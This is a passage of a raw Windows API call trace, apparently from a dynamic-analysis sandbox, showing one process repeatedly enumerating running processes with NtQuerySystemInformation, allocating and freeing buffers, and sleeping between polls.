ResultLength=0x0) returned 0x0 [0246.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.408] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.535] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.605] NtAllocateVirtualMemory (in: 